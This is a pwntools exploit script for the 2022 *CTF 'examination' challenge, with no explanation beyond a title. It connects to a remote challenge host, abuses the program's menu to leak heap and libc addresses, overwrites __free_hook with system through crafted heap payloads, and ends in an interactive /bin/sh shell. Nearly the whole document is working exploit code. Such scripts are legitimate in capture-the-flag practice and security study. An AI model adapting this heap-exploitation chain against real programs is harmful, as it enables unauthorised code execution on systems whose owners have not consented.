2022 *CTF examination

exp

from pwn import*
context.log_level = 'debug'
context.arch = 'amd64'

#s = process('./examination')
s = remote('124.70.130.92',60001)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def init_role(role):
    s.sendlineafter(b'role: <0.teacher/1.student>: ', str(role))

def add_s(num):
    s.sendlineafter(b'choice>> ', b'1')
    s.sendlineafter(b'enter the number of questions: ', str(num))

def give_score():
    s.sendlineafter(b'choice>> ', b'2')

def write_view(c,index,size,comment):
    s.sendlineafter(b'choice>> ', b'3')
    s.sendlineafter(b'which one? > ', str(index))
    if(c):
        s.sendafter(b'enter your comment:\n', comment)
    else:
        s.sendlineafter(b'please input the size of comment: ', str(size))
        s.sendafter(b'enter your comment:\n', comment)

def call_parent(index):
    s.sendlineafter(b'choice>> ', b'4')
    s.sendlineafter(b'which student id to choose?', str(index))

def change_role(role):
    s.sendlineafter(b'choice>> ', b'5')
    s.sendlineafter(b'role: <0.teacher/1.student>: ', str(role))

def t_exit():
    s.sendlineafter(b'choice>> ', b'6')

def test():
    s.sendlineafter(b'choice>> ', b'1')

def check(ptr):
    s.sendlineafter(b'choice>> ', b'2')
    s.sendafter(b'add 1 to wherever you want! addr: ', ptr)

def pray():
    s.sendlineafter(b'choice>> ', b'3')

def mode(p,score,mode):
    s.sendlineafter(b'choice>> ', b'4')
    if(p):
        s.sendlineafter(b'enter your pray score: 0 to 100\n', str(score))
    else:
        s.sendafter(b'enter your mode!\n', mode)

def change_id(index):
    s.sendlineafter(b'choice>> ', b'6')
    s.sendlineafter(b'input your id: ', str(index))

#0x5080

init_role(0)

add_s(1) # 0
add_s(1) # 1
add_s(1) # 2
write_view(0,0,0x80,b'a'*0x80)
write_view(0,1,0x80,b'a'*0x80)
write_view(0,2,0x80,b'a'*0x80)

change_role(1)
pray()
change_id(2)
pray()

change_role(0)
give_score()

change_role(1)
change_id(2)

s.sendlineafter(b'choice>> ', b'2')
s.recvuntil(b'Good Job! Here is your reward! ')
heap_base = int(s.recv(14),16) - 0x340
success('heap_base=> '+hex(heap_base))

ptr = heap_base + 0x1f
success('ptr1=>'+hex(ptr))
s.sendafter(b'add 1 to wherever you want! addr: ', str(ptr))

change_role(0)
add_s(1) # 3
write_view(0,3,0x80,b'a'*0x80)
call_parent(1)

change_role(1)
s.sendlineafter(b'choice>> ', b'2')
s.recvuntil(b'Good Job! Here is your reward! ')
heap_base = int(s.recv(14),16) - 0x2a0
success('heap_base=> '+hex(heap_base))

ptr = heap_base + 0x2e2
success('ptr2=>'+hex(ptr))
s.sendafter(b'add 1 to wherever you want! addr: ', str(ptr))

libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x1ecbe0
success('libc_base=>' +hex(libc_base))

system = libc_base + libc.sym['system']

change_role(0)

payload = b'/bin/sh\x00' + b'a'*0x80 + p64(0x91) + b'b'*0x80 + p64(0x90)*2 + b'c'*0x88
payload+= p64(0x31) + p64(heap_base + 0x570) + b'\x00'*0x20
payload+= p64(0x21) + p64(0x1) + p64(libc_base + libc.sym['__free_hook'])

write_view(1,0,0x80,payload)

write_view(1,3,0x80,p64(system))

call_parent(0)

#gdb.attach(s)
s.interactive()